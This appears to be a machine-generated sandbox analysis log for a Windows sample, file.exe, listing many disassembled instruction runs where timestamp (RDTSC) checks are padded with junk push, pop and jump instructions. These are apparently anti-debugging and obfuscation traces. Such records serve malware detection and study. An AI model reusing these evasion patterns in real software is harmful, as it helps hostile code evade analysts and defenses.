Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EEFB second address: D3EEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6812 second address: DB6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6818 second address: DB681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB681C second address: DB683D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70F070E5C6h 0x00000008 jmp 00007F70F070E5CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F70F070E5C8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6989 second address: DB69A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F70F0BCDB06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB4F second address: DBDB69 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5CCh 0x00000008 js 00007F70F070E5C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jg 00007F70F070E5D4h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDB69 second address: DBDB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC49CF second address: DC49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3C9F second address: DC3CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4233 second address: DC4268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F70F070E5D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4423 second address: DC4429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4429 second address: DC4450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pushad 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5302A second address: D53030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53030 second address: D5303D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F70F070E5C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5303D second address: D53057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F70F0BCDB0Ch 0x00000011 je 00007F70F0BCDB06h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53057 second address: D5305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5305E second address: D53063 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC98E3 second address: DC98F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC98F8 second address: DC98FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC98FE second address: DC9904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9904 second address: DC9908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9BB5 second address: DC9BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9D31 second address: DC9D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9D3B second address: DC9D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA44C second address: DCA450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA450 second address: DCA458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA996 second address: DCA99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA99C second address: DCA9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9A6 second address: DCA9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9B7 second address: DCA9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F070E5D2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9EB second address: DCA9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9EF second address: DCAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F70F070E5CEh 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA1D second address: DCAA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F0BCDB19h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA3B second address: DCAA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F70F070E5C6h 0x0000000a jo 00007F70F070E5C6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA50 second address: DCAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D8AC second address: D8D8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D8C9 second address: D8D8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB18h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D8E5 second address: D72A36 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12479AACh], esi 0x00000011 call dword ptr [ebp+122D35F9h] 0x00000017 pushad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DCD6 second address: D8DCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DCDC second address: D8DCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DE3C second address: D8DE85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 6F006A0Fh 0x0000000e mov dword ptr [ebp+12464D5Bh], esi 0x00000014 call 00007F70F0BCDB09h 0x00000019 jg 00007F70F0BCDB1Bh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F70F0BCDB0Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E2A6 second address: D8E2B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F70F070E5C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E645 second address: D8E679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F70F0BCDB0Ch 0x0000000d pop edi 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D2B2Dh] 0x00000015 push 0000001Eh 0x00000017 stc 0x00000018 sub dword ptr [ebp+122D38DAh], ecx 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F70F0BCDB0Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E679 second address: D8E688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E9EC second address: D8E9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8E9F1 second address: D8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEE5D second address: DCEE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD65A8 second address: DD65DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D7h 0x00000009 jmp 00007F70F070E5D9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48E8D second address: D48EA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F70F0BCDB06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48EA1 second address: D48EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F70F070E5CCh 0x00000012 pushad 0x00000013 jmp 00007F70F070E5D7h 0x00000018 jmp 00007F70F070E5CFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48EE9 second address: D48F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48F00 second address: D48F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD52DB second address: DD52E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5805 second address: DD5852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 je 00007F70F070E5C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jl 00007F70F070E5D4h 0x00000017 jmp 00007F70F070E5CEh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F70F070E5D6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5852 second address: DD5891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5891 second address: DD5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4FEC second address: DD5005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5005 second address: DD500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD500B second address: DD5031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB10h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F70F0BCDB10h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5E19 second address: DD5E31 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5F91 second address: DD5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6255 second address: DD6275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 jns 00007F70F070E5C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD828 second address: DDD82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD82E second address: DDD847 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD847 second address: DDD84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFD2A second address: DDFD55 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F070E5C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D9h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D03 second address: DE2D0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F70F0BCDB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D0D second address: DE2D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2D13 second address: DE2D1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2ECC second address: DE2ED6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B52 second address: DE6B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B5A second address: DE6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6CCD second address: DE6CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F70 second address: DE6F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F78 second address: DE6F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F7C second address: DE6F86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F86 second address: DE6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECDA4 second address: DECDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DECDAB second address: DECDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F70F0BCDB18h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED31A second address: DED322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED322 second address: DED32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F70F0BCDB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED32D second address: DED35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70F070E5D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED35B second address: DED381 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F70F0BCDB1Dh 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF25F3 second address: DF260D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F70F070E5C6h 0x0000000a jng 00007F70F070E5C6h 0x00000010 jng 00007F70F070E5C6h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF272D second address: DF273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF273A second address: DF2746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B46 second address: DF2B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B4A second address: DF2B54 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B54 second address: DF2BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ah 0x00000007 js 00007F70F0BCDB16h 0x0000000d jmp 00007F70F0BCDB10h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 ja 00007F70F0BCDB24h 0x0000001b jnc 00007F70F0BCDB06h 0x00000021 jmp 00007F70F0BCDB18h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2BA3 second address: DF2BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9D3B second address: DF9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9D3F second address: DF9D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F70F070E5D6h 0x0000000c jp 00007F70F070E5C6h 0x00000012 pop eax 0x00000013 ja 00007F70F070E5D2h 0x00000019 jns 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA21D second address: DFA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA22F second address: DFA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA808 second address: DFA815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA815 second address: DFA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5D9h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAD3 second address: DFAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
